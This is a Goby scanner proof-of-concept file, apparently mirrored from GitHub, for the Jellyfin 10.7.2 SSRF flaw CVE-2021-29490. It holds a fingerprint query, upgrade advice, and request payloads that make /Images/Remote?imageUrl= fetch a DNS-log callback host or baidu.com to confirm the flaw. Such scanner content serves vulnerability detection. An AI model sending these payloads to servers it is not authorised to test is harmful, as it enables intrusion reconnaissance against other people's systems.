qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/Jellyfin_10.7.2_SSRF_CVE-20...

137 lines
5.7 KiB
JSON
Raw Normal View History

auto
2022-11-25 02:08:58 -08:00
{
"Name": "Jellyfin 10.7.2 SSRF CVE-2021-29490",
"Level": "1",
"Tags": [
"ssrf"
],
"GobyQuery": "title=\"Jellyfin\"",
"Description": "Jellyfin is the volunteer-built media solution that puts you in control of your media. Stream to any device from your own server, with no strings attached.",
"Product": "Jellyfin",
"Homepage": "https://jellyfin.org/",
"Author": "",
"Impact": "Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.",
"Recommendation": "Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints \"/Items/*/RemoteImages/Download\", \"/Items/RemoteSearch/Image\" and \"/Images/Remote\".Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.",
"References": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-29490",
"https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96",
"https://mp.weixin.qq.com/s?__biz=MzkwNDI1NDUwMQ==&mid=2247485439&idx=3&sn=4bd6fc982541ca3ec610856c37a36c14"
],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"OR",
{
"Request": {
"method": "GET",
"uri": "/Images/Remote?imageUrl=http://{{{check}}}",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": "",
"set_variable": [
"check|dnslog|4|15"
]
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$dns",
"operation": "contains",
"value": "{{{check}}}",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
},
{
"Request": {
"method": "GET",
"uri": "/Images/Remote?imageUrl=http://www.baidu.com",
"follow_redirect": false,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "百度",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}